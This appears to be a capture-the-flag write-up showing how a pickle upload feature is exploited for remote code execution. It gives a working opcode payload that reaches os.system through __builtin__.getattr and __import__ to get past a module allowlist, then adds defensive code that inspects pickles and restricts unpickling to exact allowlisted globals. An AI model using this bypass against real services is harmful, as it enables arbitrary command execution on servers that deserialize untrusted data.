
`Load_note` lets us upload a pickle. If we throw the basic exploit at it:
```python
import pickle
import base64

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system, ("cat flag.txt",))

payload = pickle.dumps(PickleRce())
print(base64.b64encode(payload))
```
it answers with:
```
pickle.UnpicklingError: Your pickle is trying to load something sneaky. Only the modules __main__, __builtin__ and copyreg are allowed. eval and exec are not allowed. 'posix.system' is forbidden
```
Since we wanted RCE, we found a way to call `os.system` using only `__builtin__`:
```python
__builtin__.getattr(__builtin__.__import__("os"), "system")("cat flag.txt")
```
Now we can just translate this to Pickle, since Pickle is an actual interpreted language (for more info look [here](https://hackmd.io/@2KUYNtTcQ7WRyTsBT7oePg/BycZwjKNX?print-pdf#/)):
```python
b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%command
```

So the final exploit looks like:
```python
import pickle
import base64

print(base64.b64encode( b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%b"""cat flag.txt"""))
```
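
On the defensive side, the filter fails because it allowlists whole modules and blocklists a couple of names, which still leaves `getattr` and `__import__` reachable. The following is an added example, not code from the challenge or the original write-up: it runs on Python 3, reconstructs the filter's policy from the error message above (an assumption), statically lists the globals the payload asks for, and contrasts that with an unpickler that only resolves exact `(module, name)` pairs. The contents of `EXACT_OK` are hypothetical.

```python
import io
import pickle
import pickletools

# The opcode stream from the write-up. It is only inspected or rejected
# below; it is never executed.
SAMPLE = (b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85R"
          b"S'system'\n\x86RS'cat flag.txt'\n\x85R.")

# Policy reconstructed from the error message on the page (assumption).
MODULES_OK = {"__main__", "__builtin__", "copyreg"}
NAMES_BAD = {"eval", "exec"}

# Hardened policy: exact (module, name) pairs only. Hypothetical contents.
EXACT_OK = {("__builtin__", "set"), ("__builtin__", "frozenset")}


def requested_globals(data):
    """List the (module, name) pairs a pickle would import, without running it."""
    found = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            # genops returns the two names joined by a single space
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            # names are taken from the stack at load time, so treat as unknown
            found.append(("<dynamic>", "<dynamic>"))
    return found


def module_filter_allows(module, name):
    """Module-level allowlist plus name blocklist, as the error message describes."""
    return module in MODULES_OK and name not in NAMES_BAD


class StrictUnpickler(pickle.Unpickler):
    """Resolve a global only if the exact (module, name) pair is allowlisted."""

    def find_class(self, module, name):
        if (module, name) not in EXACT_OK:
            raise pickle.UnpicklingError(
                "global %s.%s is not allowed" % (module, name))
        return super().find_class(module, name)


def strict_loads(data):
    return StrictUnpickler(io.BytesIO(data)).load()
```

Plain data pickles (dicts, lists, strings, numbers) never reach `find_class`, so a notes feature that only stores such values can run with an empty allowlist.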